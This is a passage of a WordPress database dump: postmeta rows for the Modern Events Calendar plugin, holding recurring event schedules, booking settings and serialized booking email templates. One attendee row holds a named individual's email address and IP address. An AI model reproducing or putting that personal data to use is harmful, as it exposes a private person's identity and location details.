150333,265915,'one_occurrence','0'),(150334,265915,'mec_hide_time','0'),(150335,265915,'mec_hide_end_time','0'),(150336,265915,'mec_comment',''),(150337,265915,'mec_timezone','global'),(150338,265915,'mec_countdown_method','global'),(150339,265915,'mec_public','1'),(150340,265915,'mec_start_date','2021-11-10'),(150341,265915,'mec_start_time_hour','7'),(150342,265915,'mec_start_time_minutes','0'),(150343,265915,'mec_start_time_ampm','PM'),(150344,265915,'mec_start_day_seconds','68400'),(150345,265915,'mec_end_date','2021-11-10'),(150346,265915,'mec_end_time_hour','8'),(150347,265915,'mec_end_time_minutes','30'),(150348,265915,'mec_end_time_ampm','PM'),(150349,265915,'mec_end_day_seconds','73800'),(150350,265915,'mec_repeat_status','1'),(150351,265915,'mec_repeat_type','advanced'),(150352,265915,'mec_repeat_interval','1'),(150353,265915,'mec_repeat_end','occurrences'),(150354,265915,'mec_repeat_end_at_occurrences','11'),(150355,265915,'mec_repeat_end_at_date','2021-10-17'),(150356,265915,'mec_advanced_days','a:1:{i:0;s:5:\"Wed.2\";}'),(150357,265915,'mec_in_days',''),(150358,265915,'mec_not_in_days',''),(150359,265915,'mec_hourly_schedules','a:0:{}'),(150360,265915,'mec_booking','a:0:{}'),(150361,265915,'mec_tickets','a:0:{}'),(150362,265915,'mec_fees_global_inheritance','1'),(150363,265915,'mec_fees','a:0:{}'),(150364,265915,'mec_ticket_variations_global_inheritance','1'),(150365,265915,'mec_ticket_variations','a:0:{}'),(150366,265915,'mec_reg_fields_global_inheritance','1'),(150367,265915,'mec_reg_fields','a:0:{}'),(150368,265915,'mec_bfixed_fields','a:0:{}'),(150369,265915,'mec_op','a:0:{}'),(150370,265915,'mec_fields','a:0:{}'),(150371,265915,'mec_event_status','EventScheduled'),(150372,265915,'mec_moved_online_link',''),(150373,265915,'mec_cancelled_reason',''),(150374,265915,'mec_display_cancellation_reason_in_single_page',''),(150375,265915,'boldgrid_hide_page_title','0'),(150376,265915,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150377,265915,'passster_activate_global_protection',NULL),(150378,265915,'passster_activate_protection',NULL),(150379,265915,'passster_protection_type','password'),(150380,265915,'_dp_original','264632'),(150381,265915,'_edit_lock','1636494570:2'),(150382,265915,'_edit_last','2'),(151752,266078,'mec_end_time_ampm','PM'),(161699,266676,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(161698,266676,'boldgrid_hide_page_title','0'),(161697,266676,'mec_display_cancellation_reason_in_single_page',''),(161690,266676,'mec_reg_fields','a:0:{}'),(161691,266676,'mec_bfixed_fields','a:0:{}'),(161692,266676,'mec_op','a:0:{}'),(161693,266676,'mec_fields','a:0:{}'),(161694,266676,'mec_event_status','EventScheduled'),(161695,266676,'mec_moved_online_link',''),(161696,266676,'mec_cancelled_reason',''),(161686,266676,'mec_fees','a:0:{}'),(161687,266676,'mec_ticket_variations_global_inheritance','1'),(161688,266676,'mec_ticket_variations','a:0:{}'),(161689,266676,'mec_reg_fields_global_inheritance','1'),(161685,266676,'mec_fees_global_inheritance','1'),(161684,266676,'mec_tickets','a:0:{}'),(161683,266676,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(161682,266676,'mec_hourly_schedules','a:0:{}'),(161681,266676,'mec_not_in_days',''),(161680,266676,'mec_in_days',''),(161679,266676,'mec_advanced_days','a:0:{}'),(161678,266676,'mec_repeat_end_at_date',''),(161677,266676,'mec_repeat_end_at_occurrences',''),(161676,266676,'mec_repeat_end',''),(161675,266676,'mec_repeat_interval','1'),(161674,266676,'mec_repeat_type',''),(161673,266676,'mec_repeat_status','0'),(161672,266676,'mec_end_day_seconds','52200'),(161671,266676,'mec_end_time_ampm','PM'),(161670,266676,'mec_end_time_minutes','30'),(161625,266674,'mec_attention_time_end','1652817600'),(161626,266674,'mec_book_date_submit','20220508132803'),(161627,266674,'mec_booking_location','144'),(161628,266674,'mec_ticket_price_1','0'),(161629,266674,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"68.114.224.80\";}}'),(161630,266674,'mec_price','0'),(161631,266674,'mec_gateway','MEC_gateway_free'),(161632,266674,'mec_gateway_label','Free'),(161661,266676,'mec_countdown_method','global'),(161662,266676,'mec_public','1'),(161663,266676,'mec_start_date','2022-05-22'),(161664,266676,'mec_start_time_hour','1'),(161665,266676,'mec_start_time_minutes','0'),(161666,266676,'mec_start_time_ampm','PM'),(161667,266676,'mec_start_day_seconds','46800'),(161668,266676,'mec_end_date','2022-05-22'),(161669,266676,'mec_end_time_hour','2'),(161624,266674,'mec_attention_time_start','1652814000'),(150520,265918,'protect_children',''),(150450,265917,'protect_children',''),(151751,266078,'mec_end_time_minutes','0'),(150452,265917,'mec_color',''),(150453,265917,'mec_location_id','118'),(150454,265917,'mec_dont_show_map','0'),(150455,265917,'mec_organizer_id','1'),(150456,265917,'mec_read_more',''),(150457,265917,'mec_more_info',''),(150458,265917,'mec_more_info_title',''),(150459,265917,'mec_more_info_target','_self'),(150460,265917,'mec_cost',''),(150461,265917,'mec_currency','a:0:{}'),(150462,265917,'mec_additional_organizer_ids','a:0:{}'),(150463,265917,'mec_additional_location_ids','a:0:{}'),(150464,265917,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-12-13\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-12-13\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Mon.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"15\";}}'),(150465,265917,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Mon.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"15\";}'),(150466,265917,'mec_certain_weekdays','a:0:{}'),(150467,265917,'mec_allday','0'),(150468,265917,'one_occurrence','0'),(150469,265917,'mec_hide_time','0'),(150470,265917,'mec_hide_end_time','0'),(150471,265917,'mec_comment',''),(150472,265917,'mec_timezone','global'),(150473,265917,'mec_countdown_method','global'),(150474,265917,'mec_public','1'),(150475,265917,'mec_start_date','2021-12-13'),(150476,265917,'mec_start_time_hour','7'),(150477,265917,'mec_start_time_minutes','0'),(150478,265917,'mec_start_time_ampm','PM'),(150479,265917,'mec_start_day_seconds','68400'),(150480,265917,'mec_end_date','2021-12-13'),(150481,265917,'mec_end_time_hour','8'),(150482,265917,'mec_end_time_minutes','30'),(150483,265917,'mec_end_time_ampm','PM'),(150484,265917,'mec_end_day_seconds','73800'),(150485,265917,'mec_repeat_status','1'),(150486,265917,'mec_repeat_type','advanced'),(150487,265917,'mec_repeat_interval','1'),(150488,265917,'mec_repeat_end','occurrences'),(150489,265917,'mec_repeat_end_at_occurrences','14'),(150490,265917,'mec_repeat_end_at_date','2021-10-17'),(150491,265917,'mec_advanced_days','a:1:{i:0;s:5:\"Mon.2\";}'),(150492,265917,'mec_in_days',''),(150493,265917,'mec_not_in_days',''),(150494,265917,'mec_hourly_schedules','a:0:{}'),(150495,265917,'mec_booking','a:0:{}'),(150496,265917,'mec_tickets','a:0:{}'),(150497,265917,'mec_fees_global_inheritance','1'),(150498,265917,'mec_fees','a:0:{}'),(150499,265917,'mec_ticket_variations_global_inheritance','1'),(150500,265917,'mec_ticket_variations','a:0:{}'),(150501,265917,'mec_reg_fields_global_inheritance','1'),(150502,265917,'mec_reg_fields','a:0:{}'),(150503,265917,'mec_bfixed_fields','a:0:{}'),(150504,265917,'mec_op','a:0:{}'),(150505,265917,'mec_fields','a:0:{}'),(150506,265917,'mec_event_status','EventScheduled'),(150507,265917,'mec_moved_online_link',''),(150508,265917,'mec_cancelled_reason',''),(150509,265917,'mec_display_cancellation_reason_in_single_page',''),(150510,265917,'boldgrid_hide_page_title','0'),(150511,265917,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150512,265917,'passster_activate_global_protection',NULL),(150513,265917,'passster_activate_protection',NULL),(150514,265917,'passster_protection_type','password'),(150515,265917,'_dp_original','264632'),(150516,265917,'_edit_lock','1636495778:2'),(150517,265917,'_edit_last','2'),(161623,266674,'mec_attention_time','1652814000:1652817600'),(151750,266078,'mec_end_time_hour','4'),(150522,265918,'mec_color',''),(150523,265918,'mec_location_id','118'),(150524,265918,'mec_dont_show_map','0'),(150525,265918,'mec_organizer_id','1'),(150526,265918,'mec_read_more',''),(150527,265918,'mec_more_info',''),(150528,265918,'mec_more_info_title',''),(150529,265918,'mec_more_info_target','_self'),(150530,265918,'mec_cost',''),(150531,265918,'mec_currency','a:0:{}'),(150532,265918,'mec_additional_organizer_ids','a:0:{}'),(150533,265918,'mec_additional_location_ids','a:0:{}'),(150534,265918,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-11\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-11\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Thu.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(150535,265918,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Thu.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(150536,265918,'mec_certain_weekdays','a:0:{}'),(150537,265918,'mec_allday','0'),(150538,265918,'one_occurrence','0'),(150539,265918,'mec_hide_time','0'),(150540,265918,'mec_hide_end_time','0'),(150541,265918,'mec_comment',''),(150542,265918,'mec_timezone','global'),(150543,265918,'mec_countdown_method','global'),(150544,265918,'mec_public','1'),(150545,265918,'mec_start_date','2021-11-11'),(150546,265918,'mec_start_time_hour','7'),(150547,265918,'mec_start_time_minutes','0'),(150548,265918,'mec_start_time_ampm','PM'),(150549,265918,'mec_start_day_seconds','68400'),(150550,265918,'mec_end_date','2021-11-11'),(150551,265918,'mec_end_time_hour','8'),(150552,265918,'mec_end_time_minutes','30'),(150553,265918,'mec_end_time_ampm','PM'),(150554,265918,'mec_end_day_seconds','73800'),(150555,265918,'mec_repeat_status','1'),(150556,265918,'mec_repeat_type','advanced'),(150557,265918,'mec_repeat_interval','1'),(150558,265918,'mec_repeat_end','occurrences'),(150559,265918,'mec_repeat_end_at_occurrences','11'),(150560,265918,'mec_repeat_end_at_date','2021-10-17'),(150561,265918,'mec_advanced_days','a:1:{i:0;s:5:\"Thu.2\";}'),(150562,265918,'mec_in_days',''),(150563,265918,'mec_not_in_days',''),(150564,265918,'mec_hourly_schedules','a:0:{}'),(150565,265918,'mec_booking','a:0:{}'),(150566,265918,'mec_tickets','a:0:{}'),(150567,265918,'mec_fees_global_inheritance','1'),(150568,265918,'mec_fees','a:0:{}'),(150569,265918,'mec_ticket_variations_global_inheritance','1'),(150570,265918,'mec_ticket_variations','a:0:{}'),(150571,265918,'mec_reg_fields_global_inheritance','1'),(150572,265918,'mec_reg_fields','a:0:{}'),(150573,265918,'mec_bfixed_fields','a:0:{}'),(150574,265918,'mec_op','a:0:{}'),(150575,265918,'mec_fields','a:0:{}'),(150576,265918,'mec_event_status','EventScheduled'),(150577,265918,'mec_moved_online_link',''),(150578,265918,'mec_cancelled_reason',''),(150579,265918,'mec_display_cancellation_reason_in_single_page',''),(150580,265918,'boldgrid_hide_page_title','0'),(150581,265918,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(150582,265918,'passster_activate_global_protection',NULL),(150583,265918,'passster_activate_protection',NULL),(150584,265918,'passster_protection_type','password'),(150585,265918,'_edit_lock','1636500671:2'),(150586,265918,'_edit_last','2'),(150587,265919,'protect_children',''),(151749,266078,'mec_end_date','2021-12-20'),(150589,265919,'mec_color',''),(150590,265919,'mec_location_id','141'),(150591,265919,'mec_dont_show_map','0'),(150592,265919,'mec_organizer_id','1'),(150593,265919,'mec_read_more',''),(150594,265919,'mec_more_info',''),(150595,265919,'mec_more_info_title',''),(150596,265919,'mec_more_info_target','_self'),(150597,265919,'mec_cost',''),(150598,265919,'mec_currency','a:0:{}'),(150599,265919,'mec_additional_organizer_ids','a:0:{}'),(150600,265919,'mec_additional_location_ids','a:0:{}'),(150601,265919,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-09\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-09\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Mon.3\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(150602,265919,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Mon.3\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(150603,265919,'mec_certain_weekdays','a:0:{}'),(150604,265919,'mec_allday','0'),(150605,265919,'one_occurrence','0'),(150606,265919,'mec_hide_time','0'),(150607,265919,'mec_hide_end_time','0'),(150608,265919,'mec_comment',''),(150609,265919,'mec_timezone','global'),(150610,265919,'mec_countdown_method','global'),(150611,265919,'mec_public','1'),(150612,265919,'mec_start_date','2021-11-09'),(150613,265919,'mec_start_time_hour','7'),(150614,265919,'mec_start_time_minutes','0'),(150615,265919,'mec_start_time_ampm','PM'),(150616,265919,'mec_start_day_seconds','68400'),(150617,265919,'mec_end_date','2021-11-09'),(150618,265919,'mec_end_time_hour','8'),(150619,265919,'mec_end_time_minutes','30'),(150620,265919,'mec_end_time_ampm','PM'),(150621,265919,'mec_end_day_seconds','73800'),(150622,265919,'mec_repeat_status','1'),(150623,265919,'mec_repeat_type','advanced'),(150624,265919,'mec_repeat_interval','1'),(150625,265919,'mec_repeat_end','occurrences'),(150626,265919,'mec_repeat_end_at_occurrences','11'),(150627,265919,'mec_repeat_end_at_date','2021-10-17'),(150628,265919,'mec_advanced_days','a:1:{i:0;s:5:\"Mon.3\";}'),(150629,265919,'mec_in_days',''),(150630,265919,'mec_not_in_days',''),(150631,265919,'mec_hourly_schedules','a:0:{}'),(150632,265919,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190566,265919,'mec_event_gallery','a:0:{}'),(190567,265919,'mec_related_events','a:0:{}'),(150633,265919,'mec_tickets','a:0:{}'),(150634,265919,'mec_fees_global_inheritance','1'),(150635,265919,'mec_fees','a:0:{}'),(150636,265919,'mec_ticket_variations_global_inheritance','1'),(150637,265919,'mec_ticket_variations','a:0:{}'),(150638,265919,'mec_reg_fields_global_inheritance','1'),(150639,265919,'mec_reg_fields','a:0:{}'),(150640,265919,'mec_bfixed_fields','a:0:{}'),(150641,265919,'mec_op','a:0:{}'),(150642,265919,'mec_fields','a:0:{}'),(150643,265919,'mec_event_status','EventScheduled'),(150644,265919,'mec_moved_online_link',''),(150645,265919,'mec_cancelled_reason',''),(150646,265919,'mec_display_cancellation_reason_in_single_page',''),(150647,265919,'boldgrid_hide_page_title','0'),(150648,265919,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(159352,265919,'boldgrid_in_page_containers','1'),(150649,265919,'passster_activate_global_protection',NULL),(150650,265919,'passster_activate_protection',NULL),(150651,265919,'passster_protection_type','password'),(150654,265919,'_edit_lock','1693156849:2'),(150653,265919,'_edit_last','2'),(150655,265920,'protect_children',''),(150657,265920,'mec_color',''),(150658,265920,'mec_location_id','129'),(150659,265920,'mec_dont_show_map','0'),(150660,265920,'mec_organizer_id','1'),(150661,265920,'mec_read_more',''),(150662,265920,'mec_more_info',''),(150663,265920,'mec_more_info_title',''),(150664,265920,'mec_more_info_target','_self'),(150665,265920,'mec_cost',''),(150666,265920,'mec_currency','a:0:{}'),(150667,265920,'mec_additional_organizer_ids','a:0:{}'),(150668,265920,'mec_additional_location_ids','a:0:{}'),(150669,265920,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-14\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-14\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}}'),(150670,265920,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:3:\"end\";s:11:\"occurrences\";s:18:\"end_at_occurrences\";s:2:\"12\";}'),(150671,265920,'mec_certain_weekdays','a:0:{}'),(150672,265920,'mec_allday','0'),(150673,265920,'one_occurrence','0'),(150674,265920,'mec_hide_time','0'),(150675,265920,'mec_hide_end_time','0'),(150676,265920,'mec_comment',''),(150677,265920,'mec_timezone','global'),(150678,265920,'mec_countdown_method','global'),(150679,265920,'mec_public','1'),(150680,265920,'mec_start_date','2021-11-14'),(150681,265920,'mec_start_time_hour','8'),(150682,265920,'mec_start_time_minutes','45'),(150683,265920,'mec_start_time_ampm','AM'),(150684,265920,'mec_start_day_seconds','31500'),(150685,265920,'mec_end_date','2021-11-14'),(150686,265920,'mec_end_time_hour','10'),(150687,265920,'mec_end_time_minutes','0'),(150688,265920,'mec_end_time_ampm','AM'),(150689,265920,'mec_end_day_seconds','36000'),(150690,265920,'mec_repeat_status','1'),(150691,265920,'mec_repeat_type','advanced'),(150692,265920,'mec_repeat_interval','1'),(150693,265920,'mec_repeat_end','occurrences'),(150694,265920,'mec_repeat_end_at_occurrences','11'),(150695,265920,'mec_repeat_end_at_date','2021-10-17'),(150696,265920,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.2\";}'),(150697,265920,'mec_in_days',''),(150698,265920,'mec_not_in_days',''),(150699,265920,'mec_hourly_schedules','a:0:{}'),(150700,265920,'mec_booking','a:0:{}'),(150701,265920,'mec_tickets','a:0:{}'),(150702,265920,'mec_fees_global_inheritance','1'),(150703,265920,'mec_fees','a:0:{}'),(150704,265920,'mec_ticket_variations_global_inheritance','1'),(150705,265920,'mec_ticket_variations','a:0:{}'),(150706,265920,'mec_reg_fields_global_inheritance','1'),(150707,265920,'mec_reg_fields','a:0:{}'),(150708,265920,'mec_bfixed_fields','a:0:{}'),(150709,265920,'mec_op','a:0:{}'),(150710,265920,'mec_fields','a:0:{}'),(150711,265920,'mec_event_status','EventScheduled'),(150712,265920,'mec_moved_online_link',''),(150713,265920,'mec_cancelled_reason',''),(150714,265920,'mec_display_cancellation_reason_in_single_page',''),(150715,265920,'boldgrid_hide_page_title','0'),(150716,265920,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br 